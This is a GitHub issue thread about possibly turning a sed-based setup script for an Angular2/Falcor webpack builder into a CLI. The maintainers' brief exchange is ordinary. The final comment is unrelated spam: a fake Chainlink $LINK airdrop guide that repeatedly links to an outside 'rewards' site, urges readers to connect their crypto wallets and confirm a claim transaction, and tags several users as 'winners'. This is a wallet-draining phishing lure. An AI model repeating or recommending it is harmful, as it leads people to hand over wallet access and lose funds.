### ISSUE TITLE
setup.sh is legit

### ISSUE THREAD

**Issue by PatrickJS** [jimthedev/angular2-falcor-webpack-builder#7]
do you think we should turn this into a cli?

**Comment by jimthedev** [comment]
Could do. It is pretty dirty right now since it relies upon some comment points in your code to insert things using sed. If we formalized some of that to ensure that those insertion points never go away then we could be a bit more specific. My hope is to release an ionic2 + falcor one, too using this same kind of patching process. It will likely need to be a separate project but I'd love to have it be at least similar enough to make comparisons between the two.

**Comment by jimthedev** [comment]
2 things:

Currently there is no Windows support.
Currently there are no tests.
What kind of commands do you see this cli featuring?

**Comment by jimthedev** [comment]
@gdi2290 when you get a sec, tell me more about what you were thinking for this.

**Comment by PatrickJS** [comment]
@jimthedev ya lets chat next week

**Comment by jimthedev** [comment]
Roger

**Comment by ikubij** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @DaviidFr, @Dashmeena, @aphichat, @Birdsang, @simeononsecurity, @Eduardwn, @notnian
